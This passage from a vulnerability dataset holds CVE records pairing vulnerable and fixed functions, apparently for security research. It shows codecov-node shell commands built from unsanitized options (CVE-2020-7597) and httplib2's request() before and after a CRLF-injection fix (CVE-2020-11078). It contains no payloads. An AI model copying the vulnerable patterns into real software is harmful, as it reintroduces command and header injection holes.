(sanitizeVar(args.options['gcov-args']) || '') +\n ' %g'\n }\n debug.push(gcov)\n console.log(' $ ' + gcov)\n execSync(gcov)\n } catch (e) {\n console.log(' Failed to run gcov command.')\n }\n } else {\n debug.push('disabled gcov')\n }\n\n // Detect .bowerrc\n var bowerrc\n if (!isWindows) {\n bowerrc = execSync('test -f .bowerrc && cat .bowerrc || echo \"\"', {\n cwd: root,\n })\n .toString()\n .trim()\n } else {\n bowerrc = execSync('if exist .bowerrc type .bowerrc', { cwd: root })\n .toString()\n .trim()\n }\n if (bowerrc) {\n bowerrc = JSON.parse(bowerrc).directory\n if (bowerrc) {\n if (!isWindows) {\n more_patterns =\n \" -not -path '*/\" + bowerrc.toString().replace(/\\/$/, '') + \"/*'\"\n } else {\n more_patterns =\n '| findstr /i /v \\\\' + bowerrc.toString().replace(/\\/$/, '') + '\\\\'\n }\n }\n }\n\n var files = [],\n file = null\n if (args.options.pipe) {\n // Append piped reports\n upload += '# path=piped\\n' + args.options.pipe.join('') + '\\n<<<<<< EOF\\n'\n console.log('==> Reading report from stdin')\n } else if (args.options.file) {\n // Append manually entered reports\n file = args.options.file\n console.log('==> Targeting specific file')\n try {\n upload +=\n '# path=' +\n file +\n '\\n' +\n fs.readFileSync(file, 'utf8').toString() +\n '\\n<<<<<< EOF\\n'\n console.log(' + ' + file)\n files.push(file)\n } catch (e) {\n debug.push('failed: ' + file.split('/').pop())\n console.log(' X Failed to read file at ' + file)\n }\n } else if ((args.options.disable || '').split(',').indexOf('search') === -1) {\n console.log('==> Scanning for reports')\n var _files\n if (!isWindows) {\n _files = execSync('find ' + root + ' ' + patterns + more_patterns)\n .toString()\n .trim()\n .split('\\n')\n } else {\n // @TODO support for a root directory\n // It's not straightforward due to the nature of the dir command\n _files = execSync('dir ' + patterns + more_patterns)\n .toString()\n .trim()\n .split('\\r\\n')\n }\n if (_files) {\n for (var i2 = _files.length - 1; i2 >= 0; i2--) {\n file = _files[i2]\n try {\n upload +=\n '# path=' +\n file +\n '\\n' +\n fs.readFileSync(file, 'utf8').toString() +\n '\\n<<<<<< EOF\\n'\n console.log(' + ' + file)\n files.push(file)\n } catch (e) {\n debug.push('failed: ' + file.split('/').pop())\n console.log(' X Failed to read file at ' + file)\n }\n }\n }\n } else {\n debug.push('disabled search')\n }\n\n if (files) {\n // Upload to Codecov\n if (args.options.dump) {\n console.log('-------- DEBUG START --------')\n console.log(upload)\n console.log('-------- DEBUG END --------')\n } else {\n console.log('==> Uploading reports')\n var _upload\n if ((args.options.disable || '').split(',').indexOf('s3') === -1) {\n _upload = sendToCodecovV3\n } else {\n _upload = sendToCodecovV2\n }\n _upload(\n codecov_endpoint,\n query,\n upload,\n function() {\n // remove files after Uploading\n if (args.options.clear) {\n for (var i = files.length - 1; i >= 0; i--) {\n try {\n fs.unlinkSync(files[i])\n } catch (e) {}\n }\n }\n if (on_success) {\n on_success.apply(this, arguments)\n }\n },\n on_failure || function() {}\n )\n }\n }\n\n return {\n body: upload,\n files: files,\n query: query,\n debug: debug,\n url: codecov_endpoint,\n }\n}"}], "vul_patch": "--- a/lib/codecov.js\n+++ b/lib/codecov.js\n@@ -156,13 +156,13 @@\n if (!isWindows) {\n gcov =\n 'find ' +\n- (args.options['gcov-root'] || root) +\n+ (sanitizeVar(args.options['gcov-root']) || root) +\n \" -type f -name '*.gcno' \" +\n gcg +\n ' -exec ' +\n- (validator.escape(args.options['gcov-exec']) || 'gcov') +\n+ 
(sanitizeVar(args.options['gcov-exec']) || 'gcov') +\n ' ' +\n- (validator.escape(args.options['gcov-args']) || '') +\n+ (sanitizeVar(args.options['gcov-args']) || '') +\n ' {} +'\n } else {\n // @TODO support for root\n@@ -171,9 +171,9 @@\n 'for /f \"delims=\" %g in (\\'dir /a-d /b /s *.gcno ' +\n gcg +\n \"') do \" +\n- (args.options['gcov-exec'] || 'gcov') +\n+ (sanitizeVar(args.options['gcov-exec']) || 'gcov') +\n ' ' +\n- (args.options['gcov-args'] || '') +\n+ (sanitizeVar(args.options['gcov-args']) || '') +\n ' %g'\n }\n debug.push(gcov)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-11078", "cve_description": "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/httplib2/httplib2", "patch_url": ["https://github.com/httplib2/httplib2/commit/a1457cc31f3206cf691d11d2bf34e98865873e9e"], "programing_language": "Python", "vul_func": [{"id": "vul_py_157_1", "commit": "9413ffc", "file_path": "python2/httplib2/__init__.py", "start_line": 1946, "end_line": 2227, "snippet": " def request(\n self,\n uri,\n method=\"GET\",\n body=None,\n headers=None,\n redirections=DEFAULT_MAX_REDIRECTS,\n connection_type=None,\n ):\n \"\"\" Performs a single HTTP request.\n\n The 'uri' is the URI of the HTTP resource and can begin with either\n 'http' or 'https'. The value of 'uri' must be an absolute URI.\n\n The 'method' is the HTTP method to perform, such as GET, POST, DELETE,\n etc. There is no restriction on the methods allowed.\n\n The 'body' is the entity body to be sent with the request. It is a\n string object.\n\n Any extra headers that are to be sent with the request should be\n provided in the 'headers' dictionary.\n\n The maximum number of redirect to follow before raising an\n exception is 'redirections. 
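
For the CVE-2020-7597 record that closes on this line: the vulnerable code interpolates the gcov-root, gcov-exec and gcov-args options into a shell string executed via execSync, and the fix routes each option through a sanitizeVar helper whose definition is not included in this record. A language-neutral alternative, sketched here in Python under the assumption that the option values are untrusted, is to skip the shell entirely and pass an argv list, so metacharacters in the values stay inert:

    import subprocess
    from pathlib import Path

    def run_gcov(gcov_root: str, gcov_exec: str = "gcov") -> None:
        """Run gcov over *.gcno files found under gcov_root, without a shell.

        Because the command is an argv list (no shell=True), a value such as
        "; rm -rf ~" is just a non-existent path, never an injected command.
        """
        gcno_files = [str(p) for p in Path(gcov_root).rglob("*.gcno")]
        if gcno_files:
            subprocess.run([gcov_exec, *gcno_files], check=True)

    run_gcov(".")  # caller-supplied roots are treated as data, never re-parsed
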
The default is 5.\n\n The return value is a tuple of (response, content), the first\n being and instance of the 'Response' class, the second being\n a string that contains the response entity body.\n \"\"\"\n conn_key = ''\n\n try:\n if headers is None:\n headers = {}\n else:\n headers = self._normalize_headers(headers)\n\n if \"user-agent\" not in headers:\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n\n uri = iri2uri(uri)\n\n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n\n proxy_info = self._get_proxy_info(scheme, authority)\n\n conn_key = scheme + \":\" + authority\n conn = self.connections.get(conn_key)\n if conn is None:\n if not connection_type:\n connection_type = SCHEME_TO_CONNECTION[scheme]\n certs = list(self.certificates.iter(authority))\n if scheme == \"https\":\n if certs:\n conn = self.connections[conn_key] = connection_type(\n authority,\n key_file=certs[0][0],\n cert_file=certs[0][1],\n timeout=self.timeout,\n proxy_info=proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n ssl_version=self.ssl_version,\n key_password=certs[0][2],\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority,\n timeout=self.timeout,\n proxy_info=proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n ssl_version=self.ssl_version,\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority, timeout=self.timeout, proxy_info=proxy_info\n )\n conn.set_debuglevel(debuglevel)\n\n if \"range\" not in headers and \"accept-encoding\" not in headers:\n headers[\"accept-encoding\"] = \"gzip, deflate\"\n\n info = email.Message.Message()\n cachekey = None\n cached_value = None\n if self.cache:\n cachekey = defrag_uri.encode(\"utf-8\")\n cached_value = self.cache.get(cachekey)\n if cached_value:\n # info = email.message_from_string(cached_value)\n #\n # Need to replace the line above with the kludge below\n # to fix the non-existent bug not fixed in this\n # bug report: http://mail.python.org/pipermail/python-bugs-list/2005-September/030289.html\n try:\n info, content = cached_value.split(\"\\r\\n\\r\\n\", 1)\n feedparser = email.FeedParser.FeedParser()\n feedparser.feed(info)\n info = feedparser.close()\n feedparser._parse = None\n except (IndexError, ValueError):\n self.cache.delete(cachekey)\n cachekey = None\n cached_value = None\n\n if (\n method in self.optimistic_concurrency_methods\n and self.cache\n and \"etag\" in info\n and not self.ignore_etag\n and \"if-match\" not in headers\n ):\n # http://www.w3.org/1999/04/Editing/\n headers[\"if-match\"] = info[\"etag\"]\n\n # https://tools.ietf.org/html/rfc7234\n # A cache MUST invalidate the effective Request URI as well as [...] 
Location and Content-Location\n # when a non-error status code is received in response to an unsafe request method.\n if self.cache and cachekey and method not in self.safe_methods:\n self.cache.delete(cachekey)\n\n # Check the vary header in the cache to see if this request\n # matches what varies in the cache.\n if method in self.safe_methods and \"vary\" in info:\n vary = info[\"vary\"]\n vary_headers = vary.lower().replace(\" \", \"\").split(\",\")\n for header in vary_headers:\n key = \"-varied-%s\" % header\n value = info[key]\n if headers.get(header, None) != value:\n cached_value = None\n break\n\n if (\n self.cache\n and cached_value\n and (method in self.safe_methods or info[\"status\"] == \"308\")\n and \"range\" not in headers\n ):\n redirect_method = method\n if info[\"status\"] not in (\"307\", \"308\"):\n redirect_method = \"GET\"\n if \"-x-permanent-redirect-url\" in info:\n # Should cached permanent redirects be counted in our redirection count? For now, yes.\n if redirections <= 0:\n raise RedirectLimit(\n \"Redirected more times than rediection_limit allows.\",\n {},\n \"\",\n )\n (response, new_content) = self.request(\n info[\"-x-permanent-redirect-url\"],\n method=redirect_method,\n headers=headers,\n redirections=redirections - 1,\n )\n response.previous = Response(info)\n response.previous.fromcache = True\n else:\n # Determine our course of action:\n # Is the cached entry fresh or stale?\n # Has the client requested a non-cached response?\n #\n # There seems to be three possible answers:\n # 1. [FRESH] Return the cache entry w/o doing a GET\n # 2. [STALE] Do the GET (but add in cache validators if available)\n # 3. [TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request\n entry_disposition = _entry_disposition(info, headers)\n\n if entry_disposition == \"FRESH\":\n if not cached_value:\n info[\"status\"] = \"504\"\n content = \"\"\n response = Response(info)\n if cached_value:\n response.fromcache = True\n return (response, content)\n\n if entry_disposition == \"STALE\":\n if (\n \"etag\" in info\n and not self.ignore_etag\n and not \"if-none-match\" in headers\n ):\n headers[\"if-none-match\"] = info[\"etag\"]\n if \"last-modified\" in info and not \"last-modified\" in headers:\n headers[\"if-modified-since\"] = info[\"last-modified\"]\n elif entry_disposition == \"TRANSPARENT\":\n pass\n\n (response, new_content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n\n if response.status == 304 and method == \"GET\":\n # Rewrite the cache entry with the new end-to-end headers\n # Take all headers that are in response\n # and overwrite their values in info.\n # unless they are hop-by-hop, or are listed in the connection header.\n\n for key in _get_end2end_headers(response):\n info[key] = response[key]\n merged_response = Response(info)\n if hasattr(response, \"_stale_digest\"):\n merged_response._stale_digest = response._stale_digest\n _updateCache(\n headers, merged_response, content, self.cache, cachekey\n )\n response = merged_response\n response.status = 200\n response.fromcache = True\n\n elif response.status == 200:\n content = new_content\n else:\n self.cache.delete(cachekey)\n content = new_content\n else:\n cc = _parse_cache_control(headers)\n if \"only-if-cached\" in cc:\n info[\"status\"] = \"504\"\n response = Response(info)\n content = \"\"\n else:\n (response, content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n 
headers,\n redirections,\n cachekey,\n )\n except Exception as e:\n is_timeout = isinstance(e, socket.timeout)\n if is_timeout:\n conn = self.connections.pop(conn_key, None)\n if conn:\n conn.close()\n\n if self.force_exception_to_status_code:\n if isinstance(e, HttpLib2ErrorWithResponse):\n response = e.response\n content = e.content\n response.status = 500\n response.reason = str(e)\n elif is_timeout:\n content = \"Request Timeout\"\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"408\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Request Timeout\"\n else:\n content = str(e)\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"400\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Bad Request\"\n else:\n raise\n\n return (response, content)"}, {"id": "vul_py_157_2", "commit": "9413ffc", "file_path": "python3/httplib2/__init__.py", "start_line": 1752, "end_line": 2029, "snippet": " def request(\n self,\n uri,\n method=\"GET\",\n body=None,\n headers=None,\n redirections=DEFAULT_MAX_REDIRECTS,\n connection_type=None,\n ):\n \"\"\" Performs a single HTTP request.\nThe 'uri' is the URI of the HTTP resource and can begin\nwith either 'http' or 'https'. The value of 'uri' must be an absolute URI.\n\nThe 'method' is the HTTP method to perform, such as GET, POST, DELETE, etc.\nThere is no restriction on the methods allowed.\n\nThe 'body' is the entity body to be sent with the request. It is a string\nobject.\n\nAny extra headers that are to be sent with the request should be provided in the\n'headers' dictionary.\n\nThe maximum number of redirect to follow before raising an\nexception is 'redirections. The default is 5.\n\nThe return value is a tuple of (response, content), the first\nbeing and instance of the 'Response' class, the second being\na string that contains the response entity body.\n \"\"\"\n conn_key = ''\n\n try:\n if headers is None:\n headers = {}\n else:\n headers = self._normalize_headers(headers)\n\n if \"user-agent\" not in headers:\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n\n uri = iri2uri(uri)\n\n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n\n conn_key = scheme + \":\" + authority\n conn = self.connections.get(conn_key)\n if conn is None:\n if not connection_type:\n connection_type = SCHEME_TO_CONNECTION[scheme]\n certs = list(self.certificates.iter(authority))\n if issubclass(connection_type, HTTPSConnectionWithTimeout):\n if certs:\n conn = self.connections[conn_key] = connection_type(\n authority,\n key_file=certs[0][0],\n cert_file=certs[0][1],\n timeout=self.timeout,\n proxy_info=self.proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n tls_maximum_version=self.tls_maximum_version,\n tls_minimum_version=self.tls_minimum_version,\n key_password=certs[0][2],\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority,\n timeout=self.timeout,\n proxy_info=self.proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n tls_maximum_version=self.tls_maximum_version,\n tls_minimum_version=self.tls_minimum_version,\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority, timeout=self.timeout, proxy_info=self.proxy_info\n )\n conn.set_debuglevel(debuglevel)\n\n if \"range\" not in headers and \"accept-encoding\" not in headers:\n headers[\"accept-encoding\"] = \"gzip, 
deflate\"\n\n info = email.message.Message()\n cachekey = None\n cached_value = None\n if self.cache:\n cachekey = defrag_uri\n cached_value = self.cache.get(cachekey)\n if cached_value:\n try:\n info, content = cached_value.split(b\"\\r\\n\\r\\n\", 1)\n info = email.message_from_bytes(info)\n for k, v in info.items():\n if v.startswith(\"=?\") and v.endswith(\"?=\"):\n info.replace_header(\n k, str(*email.header.decode_header(v)[0])\n )\n except (IndexError, ValueError):\n self.cache.delete(cachekey)\n cachekey = None\n cached_value = None\n\n if (\n method in self.optimistic_concurrency_methods\n and self.cache\n and \"etag\" in info\n and not self.ignore_etag\n and \"if-match\" not in headers\n ):\n # http://www.w3.org/1999/04/Editing/\n headers[\"if-match\"] = info[\"etag\"]\n\n # https://tools.ietf.org/html/rfc7234\n # A cache MUST invalidate the effective Request URI as well as [...] Location and Content-Location\n # when a non-error status code is received in response to an unsafe request method.\n if self.cache and cachekey and method not in self.safe_methods:\n self.cache.delete(cachekey)\n\n # Check the vary header in the cache to see if this request\n # matches what varies in the cache.\n if method in self.safe_methods and \"vary\" in info:\n vary = info[\"vary\"]\n vary_headers = vary.lower().replace(\" \", \"\").split(\",\")\n for header in vary_headers:\n key = \"-varied-%s\" % header\n value = info[key]\n if headers.get(header, None) != value:\n cached_value = None\n break\n\n if (\n self.cache\n and cached_value\n and (method in self.safe_methods or info[\"status\"] == \"308\")\n and \"range\" not in headers\n ):\n redirect_method = method\n if info[\"status\"] not in (\"307\", \"308\"):\n redirect_method = \"GET\"\n if \"-x-permanent-redirect-url\" in info:\n # Should cached permanent redirects be counted in our redirection count? For now, yes.\n if redirections <= 0:\n raise RedirectLimit(\n \"Redirected more times than redirection_limit allows.\",\n {},\n \"\",\n )\n (response, new_content) = self.request(\n info[\"-x-permanent-redirect-url\"],\n method=redirect_method,\n headers=headers,\n redirections=redirections - 1,\n )\n response.previous = Response(info)\n response.previous.fromcache = True\n else:\n # Determine our course of action:\n # Is the cached entry fresh or stale?\n # Has the client requested a non-cached response?\n #\n # There seems to be three possible answers:\n # 1. [FRESH] Return the cache entry w/o doing a GET\n # 2. [STALE] Do the GET (but add in cache validators if available)\n # 3. 
[TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request\n entry_disposition = _entry_disposition(info, headers)\n\n if entry_disposition == \"FRESH\":\n if not cached_value:\n info[\"status\"] = \"504\"\n content = b\"\"\n response = Response(info)\n if cached_value:\n response.fromcache = True\n return (response, content)\n\n if entry_disposition == \"STALE\":\n if (\n \"etag\" in info\n and not self.ignore_etag\n and not \"if-none-match\" in headers\n ):\n headers[\"if-none-match\"] = info[\"etag\"]\n if \"last-modified\" in info and not \"last-modified\" in headers:\n headers[\"if-modified-since\"] = info[\"last-modified\"]\n elif entry_disposition == \"TRANSPARENT\":\n pass\n\n (response, new_content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n\n if response.status == 304 and method == \"GET\":\n # Rewrite the cache entry with the new end-to-end headers\n # Take all headers that are in response\n # and overwrite their values in info.\n # unless they are hop-by-hop, or are listed in the connection header.\n\n for key in _get_end2end_headers(response):\n info[key] = response[key]\n merged_response = Response(info)\n if hasattr(response, \"_stale_digest\"):\n merged_response._stale_digest = response._stale_digest\n _updateCache(\n headers, merged_response, content, self.cache, cachekey\n )\n response = merged_response\n response.status = 200\n response.fromcache = True\n\n elif response.status == 200:\n content = new_content\n else:\n self.cache.delete(cachekey)\n content = new_content\n else:\n cc = _parse_cache_control(headers)\n if \"only-if-cached\" in cc:\n info[\"status\"] = \"504\"\n response = Response(info)\n content = b\"\"\n else:\n (response, content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n except Exception as e:\n is_timeout = isinstance(e, socket.timeout)\n if is_timeout:\n conn = self.connections.pop(conn_key, None)\n if conn:\n conn.close()\n\n if self.force_exception_to_status_code:\n if isinstance(e, HttpLib2ErrorWithResponse):\n response = e.response\n content = e.content\n response.status = 500\n response.reason = str(e)\n elif isinstance(e, socket.timeout):\n content = b\"Request Timeout\"\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"408\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Request Timeout\"\n else:\n content = str(e).encode(\"utf-8\")\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"400\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Bad Request\"\n else:\n raise\n\n return (response, content)"}], "fix_func": [{"id": "fix_py_157_1", "commit": "a1457cc", "file_path": "python2/httplib2/__init__.py", "start_line": 1946, "end_line": 2230, "snippet": " def request(\n self,\n uri,\n method=\"GET\",\n body=None,\n headers=None,\n redirections=DEFAULT_MAX_REDIRECTS,\n connection_type=None,\n ):\n \"\"\" Performs a single HTTP request.\n\n The 'uri' is the URI of the HTTP resource and can begin with either\n 'http' or 'https'. The value of 'uri' must be an absolute URI.\n\n The 'method' is the HTTP method to perform, such as GET, POST, DELETE,\n etc. There is no restriction on the methods allowed.\n\n The 'body' is the entity body to be sent with the request. 
It is a\n string object.\n\n Any extra headers that are to be sent with the request should be\n provided in the 'headers' dictionary.\n\n The maximum number of redirect to follow before raising an\n exception is 'redirections. The default is 5.\n\n The return value is a tuple of (response, content), the first\n being and instance of the 'Response' class, the second being\n a string that contains the response entity body.\n \"\"\"\n conn_key = ''\n\n try:\n if headers is None:\n headers = {}\n else:\n headers = self._normalize_headers(headers)\n\n if \"user-agent\" not in headers:\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n\n uri = iri2uri(uri)\n # Prevent CWE-75 space injection to manipulate request via part of uri.\n # Prevent CWE-93 CRLF injection to modify headers via part of uri.\n uri = uri.replace(\" \", \"%20\").replace(\"\\r\", \"%0D\").replace(\"\\n\", \"%0A\")\n\n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n\n proxy_info = self._get_proxy_info(scheme, authority)\n\n conn_key = scheme + \":\" + authority\n conn = self.connections.get(conn_key)\n if conn is None:\n if not connection_type:\n connection_type = SCHEME_TO_CONNECTION[scheme]\n certs = list(self.certificates.iter(authority))\n if scheme == \"https\":\n if certs:\n conn = self.connections[conn_key] = connection_type(\n authority,\n key_file=certs[0][0],\n cert_file=certs[0][1],\n timeout=self.timeout,\n proxy_info=proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n ssl_version=self.ssl_version,\n key_password=certs[0][2],\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority,\n timeout=self.timeout,\n proxy_info=proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n ssl_version=self.ssl_version,\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority, timeout=self.timeout, proxy_info=proxy_info\n )\n conn.set_debuglevel(debuglevel)\n\n if \"range\" not in headers and \"accept-encoding\" not in headers:\n headers[\"accept-encoding\"] = \"gzip, deflate\"\n\n info = email.Message.Message()\n cachekey = None\n cached_value = None\n if self.cache:\n cachekey = defrag_uri.encode(\"utf-8\")\n cached_value = self.cache.get(cachekey)\n if cached_value:\n # info = email.message_from_string(cached_value)\n #\n # Need to replace the line above with the kludge below\n # to fix the non-existent bug not fixed in this\n # bug report: http://mail.python.org/pipermail/python-bugs-list/2005-September/030289.html\n try:\n info, content = cached_value.split(\"\\r\\n\\r\\n\", 1)\n feedparser = email.FeedParser.FeedParser()\n feedparser.feed(info)\n info = feedparser.close()\n feedparser._parse = None\n except (IndexError, ValueError):\n self.cache.delete(cachekey)\n cachekey = None\n cached_value = None\n\n if (\n method in self.optimistic_concurrency_methods\n and self.cache\n and \"etag\" in info\n and not self.ignore_etag\n and \"if-match\" not in headers\n ):\n # http://www.w3.org/1999/04/Editing/\n headers[\"if-match\"] = info[\"etag\"]\n\n # https://tools.ietf.org/html/rfc7234\n # A cache MUST invalidate the effective Request URI as well as [...] 
Location and Content-Location\n # when a non-error status code is received in response to an unsafe request method.\n if self.cache and cachekey and method not in self.safe_methods:\n self.cache.delete(cachekey)\n\n # Check the vary header in the cache to see if this request\n # matches what varies in the cache.\n if method in self.safe_methods and \"vary\" in info:\n vary = info[\"vary\"]\n vary_headers = vary.lower().replace(\" \", \"\").split(\",\")\n for header in vary_headers:\n key = \"-varied-%s\" % header\n value = info[key]\n if headers.get(header, None) != value:\n cached_value = None\n break\n\n if (\n self.cache\n and cached_value\n and (method in self.safe_methods or info[\"status\"] == \"308\")\n and \"range\" not in headers\n ):\n redirect_method = method\n if info[\"status\"] not in (\"307\", \"308\"):\n redirect_method = \"GET\"\n if \"-x-permanent-redirect-url\" in info:\n # Should cached permanent redirects be counted in our redirection count? For now, yes.\n if redirections <= 0:\n raise RedirectLimit(\n \"Redirected more times than rediection_limit allows.\",\n {},\n \"\",\n )\n (response, new_content) = self.request(\n info[\"-x-permanent-redirect-url\"],\n method=redirect_method,\n headers=headers,\n redirections=redirections - 1,\n )\n response.previous = Response(info)\n response.previous.fromcache = True\n else:\n # Determine our course of action:\n # Is the cached entry fresh or stale?\n # Has the client requested a non-cached response?\n #\n # There seems to be three possible answers:\n # 1. [FRESH] Return the cache entry w/o doing a GET\n # 2. [STALE] Do the GET (but add in cache validators if available)\n # 3. [TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request\n entry_disposition = _entry_disposition(info, headers)\n\n if entry_disposition == \"FRESH\":\n if not cached_value:\n info[\"status\"] = \"504\"\n content = \"\"\n response = Response(info)\n if cached_value:\n response.fromcache = True\n return (response, content)\n\n if entry_disposition == \"STALE\":\n if (\n \"etag\" in info\n and not self.ignore_etag\n and not \"if-none-match\" in headers\n ):\n headers[\"if-none-match\"] = info[\"etag\"]\n if \"last-modified\" in info and not \"last-modified\" in headers:\n headers[\"if-modified-since\"] = info[\"last-modified\"]\n elif entry_disposition == \"TRANSPARENT\":\n pass\n\n (response, new_content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n\n if response.status == 304 and method == \"GET\":\n # Rewrite the cache entry with the new end-to-end headers\n # Take all headers that are in response\n # and overwrite their values in info.\n # unless they are hop-by-hop, or are listed in the connection header.\n\n for key in _get_end2end_headers(response):\n info[key] = response[key]\n merged_response = Response(info)\n if hasattr(response, \"_stale_digest\"):\n merged_response._stale_digest = response._stale_digest\n _updateCache(\n headers, merged_response, content, self.cache, cachekey\n )\n response = merged_response\n response.status = 200\n response.fromcache = True\n\n elif response.status == 200:\n content = new_content\n else:\n self.cache.delete(cachekey)\n content = new_content\n else:\n cc = _parse_cache_control(headers)\n if \"only-if-cached\" in cc:\n info[\"status\"] = \"504\"\n response = Response(info)\n content = \"\"\n else:\n (response, content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n 
headers,\n redirections,\n cachekey,\n )\n except Exception as e:\n is_timeout = isinstance(e, socket.timeout)\n if is_timeout:\n conn = self.connections.pop(conn_key, None)\n if conn:\n conn.close()\n\n if self.force_exception_to_status_code:\n if isinstance(e, HttpLib2ErrorWithResponse):\n response = e.response\n content = e.content\n response.status = 500\n response.reason = str(e)\n elif is_timeout:\n content = \"Request Timeout\"\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"408\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Request Timeout\"\n else:\n content = str(e)\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"400\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Bad Request\"\n else:\n raise\n\n return (response, content)"}, {"id": "fix_py_157_2", "commit": "a1457cc", "file_path": "python3/httplib2/__init__.py", "start_line": 1752, "end_line": 2032, "snippet": " def request(\n self,\n uri,\n method=\"GET\",\n body=None,\n headers=None,\n redirections=DEFAULT_MAX_REDIRECTS,\n connection_type=None,\n ):\n \"\"\" Performs a single HTTP request.\nThe 'uri' is the URI of the HTTP resource and can begin\nwith either 'http' or 'https'. The value of 'uri' must be an absolute URI.\n\nThe 'method' is the HTTP method to perform, such as GET, POST, DELETE, etc.\nThere is no restriction on the methods allowed.\n\nThe 'body' is the entity body to be sent with the request. It is a string\nobject.\n\nAny extra headers that are to be sent with the request should be provided in the\n'headers' dictionary.\n\nThe maximum number of redirect to follow before raising an\nexception is 'redirections. The default is 5.\n\nThe return value is a tuple of (response, content), the first\nbeing and instance of the 'Response' class, the second being\na string that contains the response entity body.\n \"\"\"\n conn_key = ''\n\n try:\n if headers is None:\n headers = {}\n else:\n headers = self._normalize_headers(headers)\n\n if \"user-agent\" not in headers:\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n\n uri = iri2uri(uri)\n # Prevent CWE-75 space injection to manipulate request via part of uri.\n # Prevent CWE-93 CRLF injection to modify headers via part of uri.\n uri = uri.replace(\" \", \"%20\").replace(\"\\r\", \"%0D\").replace(\"\\n\", \"%0A\")\n\n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n\n conn_key = scheme + \":\" + authority\n conn = self.connections.get(conn_key)\n if conn is None:\n if not connection_type:\n connection_type = SCHEME_TO_CONNECTION[scheme]\n certs = list(self.certificates.iter(authority))\n if issubclass(connection_type, HTTPSConnectionWithTimeout):\n if certs:\n conn = self.connections[conn_key] = connection_type(\n authority,\n key_file=certs[0][0],\n cert_file=certs[0][1],\n timeout=self.timeout,\n proxy_info=self.proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n tls_maximum_version=self.tls_maximum_version,\n tls_minimum_version=self.tls_minimum_version,\n key_password=certs[0][2],\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority,\n timeout=self.timeout,\n proxy_info=self.proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n tls_maximum_version=self.tls_maximum_version,\n tls_minimum_version=self.tls_minimum_version,\n )\n else:\n conn = self.connections[conn_key] = 
